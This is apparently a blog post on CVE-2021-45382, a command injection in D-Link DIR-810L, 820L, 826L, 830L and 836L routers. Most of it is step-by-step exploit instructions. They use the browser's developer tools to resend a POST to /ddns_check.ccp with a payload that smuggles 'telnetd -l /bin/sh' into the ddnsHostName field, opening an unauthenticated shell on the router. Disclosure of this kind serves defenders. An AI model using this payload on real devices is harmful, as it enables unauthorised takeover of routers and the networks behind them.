CVE-2021-45382 D-Link Unauthenticated Remote Command Execution Vulnerability

 Introduction

A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions of D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via ddnshostname and ddnusername parameters in POST request to ddns_check.ccp.

Exploit

Open Firefox browser and enable web developer tools by going to Menu > More tools > Web Developer Tools.

Select Network tab in Web Developer Tools window.

Open management URL of the router. Eg. http://192.168.0.1

Select any request in the Web Developer Tools and click Resend > Edit and Resend option.

Modify HTTP method to POST and URL to /ddns_check.ccp

Set the request data to ccp_act=doCheck&ddnsHostName=;telnetd -l /bin/sh;&ddnsUsername=a&ddnsPassword=b

Here the injected command "telnetd -l /bin/sh" starts telnet service, which can be used to interact with router's OS without any authentication. 

Command injection can be performed using ddnsHostName or ddnsUsername parameter.

Video



Comments

Popular posts from this blog

Extract / Create Cramfs File System from Ubuntu 20.04

Dump memory to file from U-Boot console using Memory Display (md) log

Firmadyne Installation & Emulation of Firmware